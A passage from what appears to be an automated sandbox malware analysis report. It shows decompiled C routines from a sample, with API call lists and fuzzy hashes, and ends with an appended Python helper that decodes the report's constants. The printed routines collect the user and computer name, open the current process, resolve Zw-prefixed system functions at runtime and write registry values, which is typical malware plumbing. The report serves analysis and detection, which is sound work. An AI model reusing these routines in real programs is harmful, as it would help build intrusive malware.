                      						E02BD61DA(_v12);
                      					}
                      					E02BD61DA(_v16);
                      				}
                      				return _v28;
                      			}

                      APIs
                      • GetTickCount.KERNEL32 ref: 02BD7250
                      • lstrlen.KERNEL32(00000000,00000005), ref: 02BD72D1
                      • lstrlen.KERNEL32(?), ref: 02BD72E2
                      • lstrlen.KERNEL32(00000000), ref: 02BD72E9
                      • lstrlenW.KERNEL32(80000002), ref: 02BD72F0
                      • lstrlen.KERNEL32(?,00000004), ref: 02BD7359
                      • lstrlen.KERNEL32(?), ref: 02BD7362
                      • lstrlen.KERNEL32(?), ref: 02BD7369
                      • lstrlenW.KERNEL32(?), ref: 02BD7370
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: lstrlen$CountFreeHeapTick
                      • String ID:
                      • API String ID: 2535036572-0
                      • Opcode ID: 8623d53d2abf1b87174ffa1f4bc03734e17818834b16d1b83971c0b4c42569e3
                      • Instruction ID: 4de68f362a264f72455e68e744978e5393dbd15307c5a8c6b101d6e77ae68b0e
                      • Opcode Fuzzy Hash: 8623d53d2abf1b87174ffa1f4bc03734e17818834b16d1b83971c0b4c42569e3
                      • Instruction Fuzzy Hash: 1E516E32D4021AABCF11AFA4DC44ADE7BB6EF44364F0580A5ED18A7250EB35CA25DF94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD1340() {
                      				long _v8;
                      				long _v12;
                      				int _v16;
                      				long _t39;
                      				long _t43;
                      				signed int _t47;
                      				short _t51;
                      				signed int _t52;
                      				int _t56;
                      				int _t57;
                      				char* _t64;
                      				short* _t67;
                      
                      				_v16 = 0;
                      				_v8 = 0;
                      				GetUserNameW(0,  &_v8);
                      				_t39 = _v8;
                      				if(_t39 != 0) {
                      					_v12 = _t39;
                      					_v8 = 0;
                      					GetComputerNameW(0,  &_v8);
                      					_t43 = _v8;
                      					if(_t43 != 0) {
                      						_t11 = _t43 + 2; // 0x775ec742
                      						_v12 = _v12 + _t11;
                      						_t64 = E02BD33DC(_v12 + _t11 << 2);
                      						if(_t64 != 0) {
                      							_t47 = _v12;
                      							_t67 = _t64 + _t47 * 2;
                      							_v8 = _t47;
                      							if(GetUserNameW(_t67,  &_v8) == 0) {
                      								L7:
                      								E02BD61DA(_t64);
                      							} else {
                      								_t51 = 0x40;
                      								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                      								_t52 = _v8;
                      								_v12 = _v12 - _t52;
                      								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                      									goto L7;
                      								} else {
                      									_t56 = _v12 + _v8;
                      									_t31 = _t56 + 2; // 0x2bd3e01
                      									_v12 = _t56;
                      									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                      									_v8 = _t57;
                      									if(_t57 == 0) {
                      										goto L7;
                      									} else {
                      										_t64[_t57] = 0;
                      										_v16 = _t64;
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _v16;
                      			}

                      APIs
                      • GetUserNameW.ADVAPI32(00000000,02BD3DFF), ref: 02BD1354
                      • GetComputerNameW.KERNEL32(00000000,02BD3DFF), ref: 02BD1370
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • GetUserNameW.ADVAPI32(00000000,02BD3DFF), ref: 02BD13AA
                      • GetComputerNameW.KERNEL32(02BD3DFF,775EC740), ref: 02BD13CD
                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02BD3DFF,00000000,02BD3E01,00000000,00000000,?,775EC740,02BD3DFF), ref: 02BD13F0
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                      • String ID: @hqt
                      • API String ID: 3850880919-2648236075
                      • Opcode ID: c3577122318c0a5275e25c89f124b814b2f220af360e558ad6c5a21adfb3e328
                      • Instruction ID: 87c97d8bdf5b3aa1ad6e7a2c4147b4ff7ca33ff52f2a1432e9ae0a1364d9ed57
                      • Opcode Fuzzy Hash: c3577122318c0a5275e25c89f124b814b2f220af360e558ad6c5a21adfb3e328
                      • Instruction Fuzzy Hash: 2E21D476900208FFCB11DFE9D9849EEBBBCEF48244B5444AAE505E7240EB30AB45DF20
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD54D8(intOrPtr _a4) {
                      				void* _t2;
                      				unsigned int _t4;
                      				void* _t5;
                      				long _t6;
                      				void* _t7;
                      				void* _t15;
                      
                      				_t2 = CreateEventA(0, 1, 0, 0);
                      				 *0x2bda30c = _t2;
                      				if(_t2 == 0) {
                      					return GetLastError();
                      				}
                      				_t4 = GetVersion();
                      				if(_t4 != 5) {
                      					L4:
                      					if(_t15 <= 0) {
                      						_t5 = 0x32;
                      						return _t5;
                      					}
                      					L5:
                      					 *0x2bda2fc = _t4;
                      					_t6 = GetCurrentProcessId();
                      					 *0x2bda2f8 = _t6;
                      					 *0x2bda304 = _a4;
                      					_t7 = OpenProcess(0x10047a, 0, _t6);
                      					 *0x2bda2f4 = _t7;
                      					if(_t7 == 0) {
                      						 *0x2bda2f4 =  *0x2bda2f4 | 0xffffffff;
                      					}
                      					return 0;
                      				}
                      				if(_t4 >> 8 > 0) {
                      					goto L5;
                      				}
                      				_t15 = _t4 - _t4;
                      				goto L4;
                      			}

                      APIs
                      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02BD5037,?), ref: 02BD54E0
                      • GetVersion.KERNEL32 ref: 02BD54EF
                      • GetCurrentProcessId.KERNEL32 ref: 02BD550B
                      • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02BD5528
                      • GetLastError.KERNEL32 ref: 02BD5547
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                      • String ID: @MqtNqt
                      • API String ID: 2270775618-2883916605
                      • Opcode ID: 98e0c0a82d507b4efbe6d691ba8c594361b2e3e87f0e853f83db7f46935bcab3
                      • Instruction ID: c65b91a908531f1d1b0aae4f502687116073f5aacff933aef23b13405bbfb9e4
                      • Opcode Fuzzy Hash: 98e0c0a82d507b4efbe6d691ba8c594361b2e3e87f0e853f83db7f46935bcab3
                      • Instruction Fuzzy Hash: 1CF03CB0AC2703DBD7258B25A82ABD43BA3E704799F904869E596C71C1F77590A0CB19
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      • SysAllocString.OLEAUT32(00000000), ref: 02BD3ABD
                      • SysAllocString.OLEAUT32(0070006F), ref: 02BD3AD1
                      • SysAllocString.OLEAUT32(00000000), ref: 02BD3AE3
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD3B4B
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD3B5A
                      • SysFreeString.OLEAUT32(00000000), ref: 02BD3B65
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: String$AllocFree
                      • String ID:
                      • API String ID: 344208780-0
                      • Opcode ID: 8e57b440f0c2d66bc307e93fe3ae6bd126363e830f7b4db80e430d87d2bf77ac
                      • Instruction ID: 69d1d9393862b25bf6e2bcc9786162bb1ec0c149e7dff7bf6064d057328d2c14
                      • Opcode Fuzzy Hash: 8e57b440f0c2d66bc307e93fe3ae6bd126363e830f7b4db80e430d87d2bf77ac
                      • Instruction Fuzzy Hash: F9417F36D00A09ABDB01EFBCD844ADEB7BAEF49304F1444A6EA10EB151EB71D905CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E02BD6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                      				intOrPtr _v8;
                      				intOrPtr _t23;
                      				intOrPtr _t26;
                      				_Unknown_base(*)()* _t28;
                      				intOrPtr _t30;
                      				_Unknown_base(*)()* _t32;
                      				intOrPtr _t33;
                      				_Unknown_base(*)()* _t35;
                      				intOrPtr _t36;
                      				_Unknown_base(*)()* _t38;
                      				intOrPtr _t39;
                      				_Unknown_base(*)()* _t41;
                      				intOrPtr _t44;
                      				struct HINSTANCE__* _t48;
                      				intOrPtr _t54;
                      
                      				_t54 = E02BD33DC(0x20);
                      				if(_t54 == 0) {
                      					_v8 = 8;
                      				} else {
                      					_t23 =  *0x2bda348; // 0x9dd5a8
                      					_t1 = _t23 + 0x2bdb436; // 0x4c44544e
                      					_t48 = GetModuleHandleA(_t1);
                      					_t26 =  *0x2bda348; // 0x9dd5a8
                      					_t2 = _t26 + 0x2bdb85c; // 0x7243775a
                      					_v8 = 0x7f;
                      					_t28 = GetProcAddress(_t48, _t2);
                      					 *(_t54 + 0xc) = _t28;
                      					if(_t28 == 0) {
                      						L8:
                      						E02BD61DA(_t54);
                      					} else {
                      						_t30 =  *0x2bda348; // 0x9dd5a8
                      						_t5 = _t30 + 0x2bdb849; // 0x614d775a
                      						_t32 = GetProcAddress(_t48, _t5);
                      						 *(_t54 + 0x10) = _t32;
                      						if(_t32 == 0) {
                      							goto L8;
                      						} else {
                      							_t33 =  *0x2bda348; // 0x9dd5a8
                      							_t7 = _t33 + 0x2bdb72b; // 0x6e55775a
                      							_t35 = GetProcAddress(_t48, _t7);
                      							 *(_t54 + 0x14) = _t35;
                      							if(_t35 == 0) {
                      								goto L8;
                      							} else {
                      								_t36 =  *0x2bda348; // 0x9dd5a8
                      								_t9 = _t36 + 0x2bdb883; // 0x4e6c7452
                      								_t38 = GetProcAddress(_t48, _t9);
                      								 *(_t54 + 0x18) = _t38;
                      								if(_t38 == 0) {
                      									goto L8;
                      								} else {
                      									_t39 =  *0x2bda348; // 0x9dd5a8
                      									_t11 = _t39 + 0x2bdb87b; // 0x6c43775a
                      									_t41 = GetProcAddress(_t48, _t11);
                      									 *(_t54 + 0x1c) = _t41;
                      									if(_t41 == 0) {
                      										goto L8;
                      									} else {
                      										 *((intOrPtr*)(_t54 + 4)) = _a4;
                      										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                      										_t44 = E02BD7A08(_t54, _a8);
                      										_v8 = _t44;
                      										if(_t44 != 0) {
                      											goto L8;
                      										} else {
                      											 *_a12 = _t54;
                      										}
                      									}
                      								}
                      							}
                      						}
                      					}
                      				}
                      				return _v8;
                      			}

                      Instruction addresses (one per decompiled line, in order; 0x00000000 where the line has no address): 0x02bd6c08 0x02bd6c0c 0x02bd6cce 0x02bd6c12 0x02bd6c12 0x02bd6c17 0x02bd6c2a 0x02bd6c2c 0x02bd6c31 0x02bd6c39 0x02bd6c40 0x02bd6c42 0x02bd6c47 0x02bd6cc6 0x02bd6cc7 0x02bd6c49 0x02bd6c49 0x02bd6c4e 0x02bd6c56 0x02bd6c58 0x02bd6c5d 0x00000000 0x02bd6c5f 0x02bd6c5f 0x02bd6c64 0x02bd6c6c 0x02bd6c6e 0x02bd6c73 0x00000000 0x02bd6c75 0x02bd6c75 0x02bd6c7a 0x02bd6c82 0x02bd6c84 0x02bd6c89 0x00000000 0x02bd6c8b 0x02bd6c8b 0x02bd6c90 0x02bd6c98 0x02bd6c9a 0x02bd6c9f 0x00000000 0x02bd6ca1 0x02bd6ca7 0x02bd6cac 0x02bd6cb3 0x02bd6cb8 0x02bd6cbd 0x00000000 0x02bd6cbf 0x02bd6cc2 0x02bd6cc2 0x02bd6cbd 0x02bd6c9f 0x02bd6c89 0x02bd6c73 0x02bd6c5d 0x02bd6c47 0x02bd6cdc

                      APIs
                        • Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8
                      • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD37FB,?,?,?,?,00000000,00000000), ref: 02BD6C1E
                      • GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD6C40
                      • GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD6C56
                      • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD6C6C
                      • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD6C82
                      • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD6C98
                        • Part of subcall function 02BD7A08: memset.NTDLL ref: 02BD7A87
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: AddressProc$AllocateHandleHeapModulememset
                      • String ID:
                      • API String ID: 1886625739-0
                      • Opcode ID: fbfd30f9d80276cf790c7253d1f6d6dd313007309c8e12f5493dbf7b2d529e70
                      • Instruction ID: aea7363b5d958dbbfd69f9c4b057770c19d40cdef9c5b7bc8078808b96b81c9c
                      • Opcode Fuzzy Hash: fbfd30f9d80276cf790c7253d1f6d6dd313007309c8e12f5493dbf7b2d529e70
                      • Instruction Fuzzy Hash: 6D217FB064170BAFD710DF6AEA44EDAB7ECEF043587064865E405C7251FBB0EA088F60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 88%
                      			E02BD4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                      				signed int _v8;
                      				char _v12;
                      				signed int* _v16;
                      				char _v284;
                      				void* __esi;
                      				char* _t59;
                      				intOrPtr* _t60;
                      				intOrPtr _t64;
                      				char _t65;
                      				intOrPtr _t68;
                      				intOrPtr _t69;
                      				intOrPtr _t71;
                      				void* _t73;
                      				signed int _t81;
                      				void* _t91;
                      				void* _t92;
                      				char _t98;
                      				signed int* _t100;
                      				intOrPtr* _t101;
                      				void* _t102;
                      
                      				_t92 = __ecx;
                      				_v8 = _v8 & 0x00000000;
                      				_t98 = _a16;
                      				if(_t98 == 0) {
                      					__imp__( &_v284,  *0x2bda3dc);
                      					_t91 = 0x80000002;
                      					L6:
                      					_t59 = E02BD6536( &_v284,  &_v284);
                      					_a8 = _t59;
                      					if(_t59 == 0) {
                      						_v8 = 8;
                      						L29:
                      						_t60 = _a20;
                      						if(_t60 != 0) {
                      							 *_t60 =  *_t60 + 1;
                      						}
                      						return _v8;
                      					}
                      					_t101 = _a24;
                      					if(E02BD313F(_t92, _t97, _t101, _t91, _t59) != 0) {
                      						L27:
                      						E02BD61DA(_a8);
                      						goto L29;
                      					}
                      					_t64 =  *0x2bda318; // 0x35b9e40
                      					_t16 = _t64 + 0xc; // 0x35b9f62
                      					_t65 = E02BD6536(_t64,  *_t16);
                      					_a24 = _t65;
                      					if(_t65 == 0) {
                      						L14:
                      						_t29 = _t101 + 0x14; // 0x102
                      						_t33 = _t101 + 0x10; // 0x3d02bd90
                      						if(E02BD7767(_t97,  *_t33, _t91, _a8,  *0x2bda3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                      							_t68 =  *0x2bda348; // 0x9dd5a8
                      							if(_t98 == 0) {
                      								_t35 = _t68 + 0x2bdbb5a; // 0x4d4c4b48
                      								_t69 = _t35;
                      							} else {
                      								_t34 = _t68 + 0x2bdbbac; // 0x55434b48
                      								_t69 = _t34;
                      							}
                      							if(E02BD7238(_t69,  *0x2bda3d4,  *0x2bda3d8,  &_a24,  &_a16) == 0) {
                      								if(_t98 == 0) {
                      									_t71 =  *0x2bda348; // 0x9dd5a8
                      									_t44 = _t71 + 0x2bdb332; // 0x74666f53
                      									_t73 = E02BD6536(_t44, _t44);
                      									_t99 = _t73;
                      									if(_t73 == 0) {
                      										_v8 = 8;
                      									} else {
                      										_t47 = _t101 + 0x10; // 0x3d02bd90
                      										E02BD5B0E( *_t47, _t91, _a8,  *0x2bda3d8, _a24);
                      										_t49 = _t101 + 0x10; // 0x3d02bd90
                      										E02BD5B0E( *_t49, _t91, _t99,  *0x2bda3d0, _a16);
                      										E02BD61DA(_t99);
                      									}
                      								} else {
                      									_t40 = _t101 + 0x10; // 0x3d02bd90
                      									E02BD5B0E( *_t40, _t91, _a8,  *0x2bda3d8, _a24);
                      									_t43 = _t101 + 0x10; // 0x3d02bd90
                      									E02BD5B0E( *_t43, _t91, _a8,  *0x2bda3d0, _a16);
                      								}
                      								if( *_t101 != 0) {
                      									E02BD61DA(_a24);
                      								} else {
                      									 *_t101 = _a16;
                      								}
                      							}
                      						}
                      						goto L27;
                      					}
                      					_t21 = _t101 + 0x10; // 0x3d02bd90
                      					_t81 = E02BD58BD( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                      					if(_t81 == 0) {
                      						_t100 = _v16;
                      						if(_v12 == 0x28) {
                      							 *_t100 =  *_t100 & _t81;
                      							_t26 = _t101 + 0x10; // 0x3d02bd90
                      							E02BD7767(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                      						}
                      						E02BD61DA(_t100);
                      						_t98 = _a16;
                      					}
                      					E02BD61DA(_a24);
                      					goto L14;
                      				}
                      				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                      					goto L29;
                      				} else {
                      					_t97 = _a8;
                      					E02BD7AB0(_t98, _a8,  &_v284);
                      					__imp__(_t102 + _t98 - 0x117,  *0x2bda3dc);
                      					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                      					_t91 = 0x80000003;
                      					goto L6;
                      				}
                      			}


                      Instruction addresses (one per decompiled line, in order; 0x00000000 where the line has no address): 0x02bd4c94 0x02bd4c9d 0x02bd4ca4 0x02bd4ca9 0x02bd4d16 0x02bd4d1c 0x02bd4d21 0x02bd4d28 0x02bd4d2d 0x02bd4d32 0x02bd4e9d 0x02bd4ea4 0x02bd4ea4 0x02bd4ea9 0x02bd4eab 0x02bd4eab 0x02bd4eb4 0x02bd4eb4 0x02bd4d38 0x02bd4d44 0x02bd4e93 0x02bd4e96 0x00000000 0x02bd4e96 0x02bd4d4a 0x02bd4d4f 0x02bd4d52 0x02bd4d57 0x02bd4d5c 0x02bd4da5 0x02bd4da5 0x02bd4db8 0x02bd4dc2 0x02bd4dc8 0x02bd4dcf 0x02bd4dd9 0x02bd4dd9 0x02bd4dd1 0x02bd4dd1 0x02bd4dd1 0x02bd4dd1 0x02bd4dfb 0x02bd4e03 0x02bd4e31 0x02bd4e36 0x02bd4e3d 0x02bd4e42 0x02bd4e46 0x02bd4e78 0x02bd4e48 0x02bd4e55 0x02bd4e58 0x02bd4e68 0x02bd4e6b 0x02bd4e71 0x02bd4e71 0x02bd4e05 0x02bd4e12 0x02bd4e15 0x02bd4e27 0x02bd4e2a 0x02bd4e2a 0x02bd4e82 0x02bd4e8e 0x02bd4e84 0x02bd4e87 0x02bd4e87 0x02bd4e82 0x02bd4dfb 0x00000000 0x02bd4dc2 0x02bd4d6b 0x02bd4d6e 0x02bd4d75 0x02bd4d7b 0x02bd4d7e 0x02bd4d80 0x02bd4d8c 0x02bd4d8f 0x02bd4d8f 0x02bd4d95 0x02bd4d9a 0x02bd4d9a 0x02bd4da0 0x00000000 0x02bd4da0 0x02bd4cae 0x00000000 0x02bd4cd5 0x02bd4cd5 0x02bd4ce1 0x02bd4cf4 0x02bd4cfa 0x02bd4d02 0x00000000 0x02bd4d02

                      APIs
                      • StrChrA.SHLWAPI(02BD6A76,0000005F,00000000,00000000,00000104), ref: 02BD4CC7
                      • lstrcpy.KERNEL32(?,?), ref: 02BD4CF4
                        • Part of subcall function 02BD6536: lstrlen.KERNEL32(?,00000000,035B9E40,00000000,02BD6F0A,035BA063,43175AC3,?,?,?,?,43175AC3,00000005,02BDA00C,4D283A53,?), ref: 02BD653D
                        • Part of subcall function 02BD6536: mbstowcs.NTDLL ref: 02BD6566
                        • Part of subcall function 02BD6536: memset.NTDLL ref: 02BD6578
                        • Part of subcall function 02BD5B0E: lstrlenW.KERNEL32(?,?,?,02BD4E5D,3D02BD90,80000002,02BD6A76,02BD57D1,74666F53,4D4C4B48,02BD57D1,?,3D02BD90,80000002,02BD6A76,?), ref: 02BD5B33
                        • Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6
                      • lstrcpy.KERNEL32(?,00000000), ref: 02BD4D16
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true
                      • Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmp
                      • Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2bd0000_server.jbxd
                      Similarity
                      • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                      • String ID: ($\
                      • API String ID: 3924217599-1512714803
                      • Opcode ID: e14d8c276a2afe62f620c5f8932f36458495744d47fd829f2af4d9095c13d33c
                      • Instruction ID: 5915393b0b8e8ec9a360a9afa0afa083db232c674e21ebf2ea8c99636fc142f4
                      • Opcode Fuzzy Hash: e14d8c276a2afe62f620c5f8932f36458495744d47fd829f2af4d9095c13d33c
                      • Instruction Fuzzy Hash: CA51F57250020AFFDF259FA4DD40EEA7BBAEB08394F008998FA1596160F731D965EF50
                      Uniqueness

                      Uniqueness Score: -1.00%
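The API lists in the entries above print string arguments as raw DWORDs (the decompiler records only the first four bytes of each name, e.g. 7243775A for the GetProcAddress calls in E02BD6BF9, 4C44544E for GetModuleHandleA), OpenProcess gets a numeric access mask (0010047A), and E02BD4C94 picks a registry hive through 0x80000002 / 0x80000003 and string references whose first DWORD is 4D4C4B48, 55434B48 or 74666F53. The following helper is an added example by the editor, not part of the Joe Sandbox report or of the sample; it parses lines in the report's "Name.MODULE(args), ref: addr" layout and labels such immediates. The regex and the embedded sample lines are assumptions constructed from the entries on this page, and a DWORD that decodes to text confirms only the first four characters of the string, never the whole API name.

```python
"""Label the immediates Joe Sandbox prints in its 'APIs' lists (editor's example).

Assumptions: the sample lines are copied from this report's entries; the regex
mirrors the 'Name.MODULE(args), ref: addr' layout seen here and is not an
official parser; a decoded 4-byte value is only the first four characters of
a string argument, never the whole name.
"""
import re
import struct

# Constructed sample: lines as they appear in the entries above.
SAMPLE_API_LINES = """
• OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02BD5528
• GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02BD37FB,?,?,?,?,00000000,00000000), ref: 02BD6C1E
• GetProcAddress.KERNEL32(00000000,7243775A), ref: 02BD6C40
• GetProcAddress.KERNEL32(00000000,614D775A), ref: 02BD6C56
• GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02BD6C6C
• GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02BD6C82
• GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02BD6C98
• StrChrA.SHLWAPI(02BD6A76,0000005F,00000000,00000000,00000104), ref: 02BD4CC7
• GetVersion.KERNEL32 ref: 02BD54EF
"""

_API_RE = re.compile(
    r"^(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"      # nested-call prefix
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)

# PROCESS_* rights from winnt.h; OpenProcess's first argument is a mask of these.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x00100000: "SYNCHRONIZE",
}

# Other constants that recur in the decompiled functions on this page.
KNOWN_CONSTANTS = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
    0x3E5: "ERROR_IO_PENDING",
}


def dword_as_ascii(value):
    """Little-endian bytes of a DWORD as text if all four are printable ASCII, else None.

    0x7243775A is stored as 5A 77 43 72, i.e. the characters 'Z','w','C','r'.
    """
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    return raw.decode("ascii") if all(0x20 <= b < 0x7F for b in raw) else None


def decode_process_access(mask):
    """Names of the PROCESS_* bits set in an OpenProcess mask, lowest bit first."""
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    leftover = mask & ~sum(PROCESS_ACCESS)
    if leftover:
        names.append(f"0x{leftover:08X}")   # bits this table does not name
    return names


def describe_constant(value):
    """Known constant name, else ASCII prefix, else None."""
    return KNOWN_CONSTANTS.get(value) or dword_as_ascii(value)


def parse_api_line(line):
    """One API line -> dict(api, module, ref, args); None for non-API lines."""
    m = _API_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    args = []
    for a in filter(None, (m.group("args") or "").split(",")):
        try:
            args.append(int(a, 16))
        except ValueError:
            args.append(None)        # '?' = argument the plugin could not resolve
    return {"api": m.group("api"), "module": m.group("module"),
            "ref": int(m.group("ref"), 16), "args": args}


def annotate(report_text):
    """Parse every API line and attach a decoded label per argument."""
    rows = []
    for line in report_text.splitlines():
        entry = parse_api_line(line)
        if entry is None:
            continue
        entry["decoded"] = [None if a is None else describe_constant(a)
                            for a in entry["args"]]
        if entry["api"] == "OpenProcess" and entry["args"]:
            entry["decoded"][0] = " | ".join(decode_process_access(entry["args"][0]))
        rows.append(entry)
    return rows


if __name__ == "__main__":
    for row in annotate(SAMPLE_API_LINES):
        print(f"{row['ref']:08X} {row['api']:<18}", [d for d in row["decoded"] if d])
```

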